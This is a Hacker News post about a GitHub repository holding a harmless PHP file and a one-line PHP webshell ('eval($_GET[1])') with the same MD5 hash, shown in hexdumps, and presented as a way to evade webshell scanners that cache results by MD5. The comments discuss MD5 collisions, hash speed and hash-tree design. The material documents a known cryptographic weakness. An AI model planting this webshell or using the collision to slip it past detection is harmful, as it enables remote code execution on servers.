A webshell and a normal file that have the same MD5

2025-09-21 5:52 · github.com

A webshell and a normal file that have the same MD5 - phith0n/collision-webshell

This repository contains two files, normal.php and webshell.php, that have the same MD5 hash.

MD5 for the files:

$ md5sum *.php
b719a17ae091ed45fb874c15b2d9663f  normal.php
b719a17ae091ed45fb874c15b2d9663f  webshell.php

Hexdump for the webshell.php:

$ hexdump -C webshell.php
00000000  3c 3f 3d 65 76 61 6c 28  24 5f 47 45 54 5b 31 5d  |<?=eval($_GET[1]|
00000010  29 3b 3f 3e 3d 62 84 11  01 75 d3 4d eb 80 93 de  |);?>=b...u.M....|
00000020  31 c1 d9 30 45 fb be 1e  71 f0 0a 63 75 a8 30 aa  |1..0E...q..cu.0.|
00000030  98 17 ca e3 00 00 00 00  bf 99 ad 4b 58 bc fc 4c  |...........KX..L|
00000040  5c ac 31 42 33 35 c4 16  05 46 c3 93 ae 3e f4 a3  |\.1B35...F...>..|
00000050  4f 8e 33 76 8c 22 19 8b  b0 31 fd ed 34 3c 56 68  |O.3v."...1..4<Vh|
00000060  08 4a 5b 47 10 ca 8d 46  ac 26 29 5f d2 bd f3 dd  |.J[G...F.&)_....|
00000070  0d b2 ac cd 3f 71 d8 a5  53 23 cb bf cf 1d 37 de  |....?q..S#....7.|
00000080  c7 50 86 48 b8 5c 6c 57  2f 49 4e 35 1e 2d 5b 31  |.P.H.\lW/IN5.-[1|
00000090  4f e1 94 68 0f 3e e9 79  b2 84 54 62 88 29 3b 09  |O..h.>.y..Tb.);.|
000000a0  67 0c 25 64 2c 6e 49 1e  1e 42 f2 9c 37 e4 34 f9  |g.%d,nI..B..7.4.|
000000b0  f6 10 cd aa 72 ec 2e 42  6a 69 5f 14 b7 b9 27 9b  |....r..Bji_...'.|
000000c0  ce fa 2c a7 7b 03 70 5b  c0 7a 43 dd 54 a0 42 cc  |..,.{.p[.zC.T.B.|
000000d0  d7 1f 89 cb db a5 eb c0  14 ba 02 d6 99 2d 28 94  |.............-(.|
000000e0  15 c4 bf 66 9d bd 69 ed  0a 27 73 a8 78 9b 83 52  |...f..i..'s.x..R|
000000f0  ea b4 4c 8d f8 7a 81 e4  5f 3b 5a f6 b8 5d 05 a0  |..L..z.._;Z..]..|
00000100  60 9f 1a 39 6a 66 bf 69  0e 38 7e 1e 0b 62 d5 2c  |`..9jf.i.8~..b.,|
00000110  ac 04 2d 0d 6d ae 27 f0  4e c7 1b 91 80 e0 fe 35  |..-.m.'.N......5|
00000120  2e 38 58 67 e3 50 6e 56  61 27 6b e8 eb 04 67 4b  |.8Xg.PnVa'k...gK|
00000130  1f 1d b7 a7 71 6b 01 18  4b d8 f8 a3 30 16 69 4f  |....qk..K...0.iO|
00000140  c7 db 95 06 0c f3 45 52  92 7e 8f f7 22 36 4f 6c  |......ER.~.."6Ol|
00000150  24 a9 14 1f f4 f2 5c 09  41 50 58 3e 75 7c b2 d6  |$.....\.APX>u|..|
00000160  bf 45 67 6a ef 18 b2 94  ac 52 50 a7 38 fa fc 52  |.Egj.....RP.8..R|
00000170  f7 36 db b4 98 31 a0 e5  43 4f 6d 3f c9 29 64 86  |.6...1..COm?.)d.|
00000180  a3 98 f9 64 9d d3 2e 1c  b2 d2 f9 35 9d 80 56 8b  |...d.......5..V.|
00000190  69 2f 9f d6 a7 83 dd 20  90 1c 31 4f 14 a6 20 20  |i/..... ..1O..  |
000001a0  21 8f 5f 6b 1e 2a 92 da  2e 4c 0a 0e 17 a9 20 c0  |!._k.*...L.... .|
000001b0  7e 62 8f 73 9a 83 32 30  71 8d f0 e0 70 c9 85 de  |~b.s..20q...p...|
000001c0  c0 80 d6 8e f6 20 77 4b  5d 9f 14 49 3d 3f aa c5  |..... wK]..I=?..|
000001d0  0c 42 92 42 9e 7f 21 43  32 ab 54 b2 33 21 c0 93  |.B.B..!C2.T.3!..|
000001e0  74 28 ed f9 25 85 60 e3  7e 32 b6 a4 4e 12 50 b7  |t(..%.`.~2..N.P.|
000001f0  0c d5 95 35 ae d7 ee 14  60 de 1f c9 cd 4b b8 ed  |...5....`....K..|
00000200

Hexdump for the normal.php:

$ hexdump -C normal.php
00000000  78 78 78 78 78 78 78 78  78 78 78 78 78 61 61 61  |xxxxxxxxxxxxxaaa|
00000010  61 61 61 61 97 25 a6 fb  17 28 1a d3 52 62 cb c7  |aaaa.%...(..Rb..|
00000020  55 d7 cd 86 e5 5f d0 83  01 9b 4d 55 06 61 ab 88  |U...._....MU.a..|
00000030  11 8a fa 4d 00 00 00 00  d9 73 ee ef 8a f6 75 2a  |...M.....s....u*|
00000040  5c ac 31 42 33 35 c4 16  05 46 c3 93 ae 3e f4 a3  |\.1B35...F...>..|
00000050  4f 8e 33 76 8c 22 19 8b  b0 31 fd ed 34 3c 56 68  |O.3v."...1..4<Vh|
00000060  08 4a 5b 47 10 ca 8d 46  ac 26 29 5f d2 c5 f3 dd  |.J[G...F.&)_....|
00000070  0d b2 ac cd 3f 71 d8 a5  53 23 cb bf cf 1d 37 de  |....?q..S#....7.|
00000080  c7 50 86 48 b8 5c 6c 57  2f 49 4e 35 1e 2d 5b 31  |.P.H.\lW/IN5.-[1|
00000090  4f e1 94 68 0f 3e e9 79  b2 84 54 62 88 29 3b 09  |O..h.>.y..Tb.);.|
000000a0  67 0c 25 64 2c 6e 49 1e  1e 42 f2 9c 37 c4 34 f9  |g.%d,nI..B..7.4.|
000000b0  f6 10 cd aa 72 ec 2e 42  6a 69 5f 14 b7 b9 27 9b  |....r..Bji_...'.|
000000c0  ce fa 2c a7 7b 03 70 5b  c0 7a 43 dd 54 a0 42 cc  |..,.{.p[.zC.T.B.|
000000d0  d7 1f 89 cb db a5 eb c0  14 ba 02 d6 99 2d 28 94  |.............-(.|
000000e0  15 c4 bf 66 9d bd 69 ed  0a 27 73 a8 7a 9b 83 52  |...f..i..'s.z..R|
000000f0  ea b4 4c 8d f8 7a 81 e4  5f 3b 5a f6 b8 5d 05 a0  |..L..z.._;Z..]..|
00000100  60 9f 1a 39 6a 66 bf 69  0e 38 7e 1e 0b 62 d5 2c  |`..9jf.i.8~..b.,|
00000110  ac 04 2d 0d 6d ae 27 f0  4e c7 1b 91 80 e0 fe 35  |..-.m.'.N......5|
00000120  2e 38 58 67 e3 50 6e 56  61 27 6b e8 6b 05 67 4b  |.8Xg.PnVa'k.k.gK|
00000130  1f 1d b7 a7 71 6b 01 18  4b d8 f8 a3 30 16 69 4f  |....qk..K...0.iO|
00000140  c7 db 95 06 0c f3 45 52  92 7e 8f f7 22 36 4f 6c  |......ER.~.."6Ol|
00000150  24 a9 14 1f f4 f2 5c 09  41 50 58 3e 75 7c b2 d6  |$.....\.APX>u|..|
00000160  bf 45 67 6a ef 18 b2 94  ac 52 50 a7 38 fa f8 52  |.Egj.....RP.8..R|
00000170  f7 36 db b4 98 31 a0 e5  43 4f 6d 3f c9 29 64 86  |.6...1..COm?.)d.|
00000180  a3 98 f9 64 9d d3 2e 1c  b2 d2 f9 35 9d 80 56 8b  |...d.......5..V.|
00000190  69 2f 9f d6 a7 83 dd 20  90 1c 31 4f 14 a6 20 20  |i/..... ..1O..  |
000001a0  21 8f 5f 6b 1e 2a 92 da  2e 4c 0a 0e 17 a9 20 be  |!._k.*...L.... .|
000001b0  7e 62 8f 73 9a 83 32 30  71 8d f0 e0 70 c9 85 de  |~b.s..20q...p...|
000001c0  c0 80 d6 8e f6 20 77 4b  5d 9f 14 49 3d 3f aa c5  |..... wK]..I=?..|
000001d0  0c 42 92 42 9e 7f 21 43  32 ab 54 b2 33 21 c0 93  |.B.B..!C2.T.3!..|
000001e0  74 28 ed f9 25 85 60 e3  7e 32 b6 a4 4e 12 30 b7  |t(..%.`.~2..N.0.|
000001f0  0c d5 95 35 ae d7 ee 14  60 de 1f c9 cd 4b b8 ed  |...5....`....K..|
00000200

This pair can be used to bypass some webshell detections that cache their results by MD5 hash.
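From the defender's side, one way to notice such a pair is to compare files under a second, unbroken hash. The following is a minimal sketch, not part of the repository: the helper names `file_digest` and `is_md5_collision` are hypothetical, and it assumes the local Python build still exposes MD5 through `hashlib`.

```python
import hashlib


def file_digest(path, algorithm):
    """Return the hex digest of a file, read in chunks to bound memory use."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def is_md5_collision(path_a, path_b):
    """True when two files share an MD5 digest but differ under SHA-256."""
    same_md5 = file_digest(path_a, "md5") == file_digest(path_b, "md5")
    same_sha256 = file_digest(path_a, "sha256") == file_digest(path_b, "sha256")
    return same_md5 and not same_sha256
```

Calling `is_md5_collision("normal.php", "webshell.php")` on the two files described above should report a collision. A cache keyed on the SHA-256 digest instead of MD5 would not confuse the two.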


Comments

  • By Dwedit 2025-09-24 5:27

    Proof of Concept or GTFO issue 0x14 is a PDF document file that can also be run as a NES ROM. The file will display its own MD5 hash in a PDF viewer, and also displays its own MD5 hash in a NES emulator (only first 40KB+16 bytes are actually loaded there)

    https://github.com/angea/pocorgtfo#0x14

    And yes, documents are not normally supposed to be able to display their own MD5 hash.

  • By Retr0id 2025-09-24 10:24

    I made https://github.com/DavidBuchanan314/monomorph, which packs up to 4KB of shellcode into an executable that always has the same hash. So you're not just limited to a good/evil pair, you can arbitrarily change the behaviour in future without changing the hash.

    Also, a more recent innovation in MD5 collisions is textcoll, which creates colliding blocks that are completely plaintext. This would allow for colliding PHP source files like in OP but without any obvious binary artefacts (although this requires identical prefixes).

    https://github.com/cr-marcstevens/hashclash?tab=readme-ov-fi...

  • By magicalhippo 2025-09-24 8:14 (1 reply)

    Not only is MD5 broken as shown here, if you have a modern CPU it's also quite slow compared to good, non-broken alternatives. See for example this comparison[1] (the post says JavaScript, but it's OpenSSL's implementation that is actually tested).

    [1]: https://lemire.me/blog/2025/01/11/javascript-hashing-speed-c...

    • By gruez 2025-09-24 10:02 (2 replies)

      I only see new CPUs benchmarked, maybe that's because newer CPUs have SHA acceleration extensions? I'd expect SHA256 to be more complex and therefore be more computationally expensive.

      • By sltkr 2025-09-24 10:48 (2 replies)

        Yes, SHA256 is faster than MD5 only if you have hardware acceleration. But SHA256 itself is pretty slow compared to the state of the art. For example, BLAKE3 is just as secure as SHA256 but an order of magnitude faster.

        Try this on your own system:

            $ head -c 1000000000 /dev/urandom > random-1gb
            
            $ time md5sum random-1gb 
            ef72a3616aad5117ddf40a7d5f5d0162  random-1gb
            
            real 0m2.428s
            user 0m2.192s
            sys 0m0.202s
            
            $ time sha256sum random-1gb 
            ec7d7f31c4489acae8328fddbe54157f1cb9e97b220ef502a07e1f9230969310  random-1gb
            
            real 0m3.894s
            user 0m3.697s
            sys 0m0.181s
            
            $ time b3sum random-1gb 
            11fe11cc5721faf65369d18893d7b7631f6178b4692bc0bb03b1b180273cd384  random-1gb
            
            real 0m0.282s !!!
            user 0m0.876s
            sys 0m0.124s
            
            $ time b3sum --num-threads=1 random-1gb 
            11fe11cc5721faf65369d18893d7b7631f6178b4692bc0bb03b1b180273cd384  random-1gb
            
            real 0m0.597s
            user 0m0.488s
            sys 0m0.107s
        
        This is on an old Chromebook with an Intel(R) Core(TM) m3-6Y30 CPU @ 0.90GHz (dual core, but with hyperthreading). Note that even using only a single thread (which SHA256 and MD5 are limited to by their design), BLAKE3 is 6x as fast as SHA256 and 4x as fast as MD5.
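The same comparison can be approximated without the command-line tools. This is a rough sketch using only Python's standard `hashlib`. BLAKE3 is not in the standard library, so BLAKE2b stands in for it here as an assumption, and its numbers will not match `b3sum`. The function names `throughput_mb_s` and `compare` are made up for this example.

```python
import hashlib
import os
import time


def throughput_mb_s(algorithm, data, repeats=3):
    """Best-of-N single-threaded hashing throughput in MB/s."""
    best = float("inf")
    for _ in range(repeats):
        start = time.perf_counter()
        hashlib.new(algorithm, data).digest()
        best = min(best, time.perf_counter() - start)
    # Guard against a zero reading on very coarse timers.
    return len(data) / max(best, 1e-9) / 1e6


def compare(size=16_000_000, algorithms=("md5", "sha256", "blake2b")):
    """Hash the same random buffer with each algorithm and report MB/s."""
    data = os.urandom(size)
    return {name: throughput_mb_s(name, data) for name in algorithms}


if __name__ == "__main__":
    for name, rate in compare().items():
        print(f"{name:8s} {rate:10.1f} MB/s")
```

Results depend heavily on whether the CPU and the linked OpenSSL build use SHA hardware instructions, so the ranking may differ from the Chromebook figures above.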

        • By edgineer 2025-09-25 8:20 (2 replies)

          >BLAKE3 is just as secure as SHA256 but an order of magnitude faster

          Is this not an oxymoron? E.g. b3 then ought to be an order of magnitude easier to brute force.

          • By oconnor663 2025-09-25 21:24

            This is a common misconception, based on the difference between password hashing and other general uses for a cryptographic hash. Password hashing is special, because we want to protect people who pick terrible passwords, so we need guess-and-check to be expensive. But for most other use cases, like say HMAC or signing, the number of possible inputs is so astronomically large that guess-and-check would be impossible even if each guess was e.g. just a single add instruction. This distinction is why we say never to use a general purpose hash with passwords.
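To illustrate the distinction, here is a minimal sketch of deliberately expensive password hashing using PBKDF2 from Python's standard library. The iteration count, salt length, and function names are illustrative assumptions rather than a recommendation from the thread. A memory-hard scheme would normally be preferred, but none ships in every `hashlib` build.

```python
import hashlib
import hmac
import os


def hash_password(password, salt=None, iterations=600_000):
    """Derive a key from a password; the iteration count makes each guess costly."""
    if salt is None:
        salt = os.urandom(16)  # a fresh random salt per password
    key = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, iterations, key


def verify_password(password, salt, iterations, expected_key):
    """Recompute the key and compare in constant time."""
    _, _, key = hash_password(password, salt, iterations)
    return hmac.compare_digest(key, expected_key)
```

A single SHA-256 call costs an attacker almost nothing per guess, whereas each guess against this scheme costs `iterations` HMAC evaluations.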

          • By sltkr 2025-09-25 12:07

            I'm talking about theoretical security, i.e. the number of operations needed to perform certain attacks.

            For a 256-bit cryptographic hash function, it should take an expected 2^256 attempts to find a message with a given hash (preimage attack) and around 2^128 attempts to find any collision (due to the birthday paradox), and a few other properties like that. This holds for both SHA-256 and Blake3 (as far as we know; neither algorithm has proven security) but not for MD5.

            MD5 is insecure not just because its output size of 128 bits is too short (though that's a problem too), but also because it has weaknesses that allow constructing collisions with far fewer than the 2^64 attempts you would expect on the basis of its output size. That's why MD5 is considered insecure even for its size.

            Generally speaking, you want your hashing primitives to be as fast as possible. The practical security then comes from the output size. If someone discovered a secure 320-bit cryptographic hash that is a trillion times faster than even Blake3 (10^12 or about 2^40), everyone should adopt it, because it would be much faster and even more secure against brute force attacks than SHA-256/Blake3 are (since 320 > 256 + 40).

            While there are use cases for deliberately slow hash functions too (notably password hashing) those can be constructed using fast hash functions as primitives. For example, one of the strongest password hashing schemes (Argon2) is based on one of the fastest hashing primitives (Blake2), not a slow one as you might have expected.
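The birthday bound can be observed directly on a deliberately shortened hash. The sketch below is an illustration, not an attack on any real function: it truncates SHA-256 to a small number of bits and searches for two inputs with the same truncated value. The names `truncated_hash` and `find_collision` are hypothetical.

```python
import hashlib


def truncated_hash(message, bits):
    """Top `bits` bits of SHA-256(message), as an integer."""
    digest = hashlib.sha256(message).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def find_collision(bits):
    """Hash successive counters until two share a truncated hash.

    Returns (first_message, second_message, attempts). By the pigeonhole
    principle this stops after at most 2**bits + 1 attempts; the birthday
    bound says to expect on the order of 2**(bits / 2).
    """
    seen = {}
    counter = 0
    while True:
        message = str(counter).encode()
        h = truncated_hash(message, bits)
        if h in seen:
            return seen[h], message, counter + 1
        seen[h] = message
        counter += 1
```

With `bits=32` the search typically finishes after tens of thousands of attempts rather than billions, which is why a 128-bit output gives only about 64 bits of collision resistance even when the function has no structural weakness.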

        • By adrian_b 2025-09-24 11:12 (1 reply)

          Unlike SHA-256, BLAKE3 can be evaluated in parallel, so the speedup factor over SHA-256 depends on the number of available CPU cores.

          While BLAKE3 can be many times faster than SHA-256, by consuming many times more power, the amount of work for computing a hash differs much less between the 2 hashes than the execution time on a multi-core CPU.

          The speed difference quoted by you for a single thread is caused by your Skylake-based CPU, which does not have the SHA hardware instructions.

          Moreover, even the programs that claim to use the SHA hardware instructions may have a speed several times lower than allowed by the hardware, because the more recent CPUs, e.g. from the last 4 years, have wider SHA instructions than the older CPUs, but the programs must have been compiled to support such CPUs, e.g. Zen 3 and newer or Alder Lake and newer.

          • By amelius 2025-09-24 12:04 (2 replies)

            This makes me wonder how much security suffers if you split a file in N smaller files, compute a hash for each of them, then hash the concatenation of the hashes.

            • By adrian_b 2025-09-24 13:10

              BLAKE3 and other parallelizable hashes do exactly this, but using a somewhat more complex algorithm, which ensures that the result is a secure hash.

              Such an algorithm was first published by Ralph Merkle in 1979 and has been improved since:

              https://en.wikipedia.org/wiki/Merkle_tree

              For security, it is necessary to use different hash functions at different levels in the hash tree, but this is trivially achieved by using the same hash function, but also hashing some extra distinguishing data besides the hashes from the previous level.
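The idea of hashing extra distinguishing data at each level can be sketched as follows. This is a simplified illustration built on SHA-256 with one-byte prefixes for leaves and interior nodes. It is not BLAKE3's actual construction, has not been reviewed for security, and the names, prefix bytes and chunk size are all assumptions made for the example.

```python
import hashlib

LEAF_PREFIX = b"\x00"  # marks hashes of raw data chunks
NODE_PREFIX = b"\x01"  # marks hashes that combine two child hashes


def leaf_hash(chunk):
    return hashlib.sha256(LEAF_PREFIX + chunk).digest()


def node_hash(left, right):
    return hashlib.sha256(NODE_PREFIX + left + right).digest()


def merkle_root(data, chunk_size=1024):
    """Split data into chunks, hash each, then combine pairwise up to one root."""
    chunks = [data[i:i + chunk_size] for i in range(0, len(data), chunk_size)]
    level = [leaf_hash(c) for c in chunks] or [leaf_hash(b"")]
    while len(level) > 1:
        next_level = []
        for i in range(0, len(level) - 1, 2):
            next_level.append(node_hash(level[i], level[i + 1]))
        if len(level) % 2:
            next_level.append(level[-1])  # an unpaired node moves up unchanged
        level = next_level
    return level[0]
```

The leaf hashes are independent of each other, so they could be computed on separate cores. The prefixes keep a leaf whose content happens to be two concatenated hashes from being confused with an interior node.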

            • By oconnor663 2025-09-24 13:43

              It's "easy" to do it right but also very common to do it wrong: https://jacko.io/tree_hashing.html

      • By adrian_b 2025-09-24 11:06

        Hardware SHA-1 and SHA-256 are now supported by many CPUs, many of which are already older than a decade, i.e. almost all 64-bit ARM-based CPUs, all AMD Zen, many generations of Intel Atom and the Intel Core CPUs starting with Ice Lake.
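On Linux, whether a given machine has these instructions can usually be read from `/proc/cpuinfo`. The sketch below assumes the kernel reports the x86 extension as the flag `sha_ni` and the 64-bit ARM one as the feature `sha2`. The function name is hypothetical and other operating systems need a different approach.

```python
def has_sha_extensions(cpuinfo_text):
    """Return True if /proc/cpuinfo-style text lists a SHA-256 hardware flag."""
    for line in cpuinfo_text.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() in ("flags", "features"):
            tokens = set(value.split())
            # Assumed flag names: "sha_ni" on x86, "sha2" on 64-bit ARM.
            if "sha_ni" in tokens or "sha2" in tokens:
                return True
    return False


if __name__ == "__main__":
    with open("/proc/cpuinfo") as f:
        print(has_sha_extensions(f.read()))
```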

        The only CPUs still likely to be in use and without SHA support are the Intel Core CPUs until and including the Skylake derivatives (i.e. up to Comet Lake, i.e. up to 6 years ago).

        The Intel Atoms have received SHA support many years before Intel Core, because they competed with ARM, which already had such support.

        The support in Intel Core has been added due to AMD Zen, but the products with it have been delayed by the failure of Intel to achieve acceptable fabrication yields in their 10-nm CMOS process, before 2019/2020.

HackerNews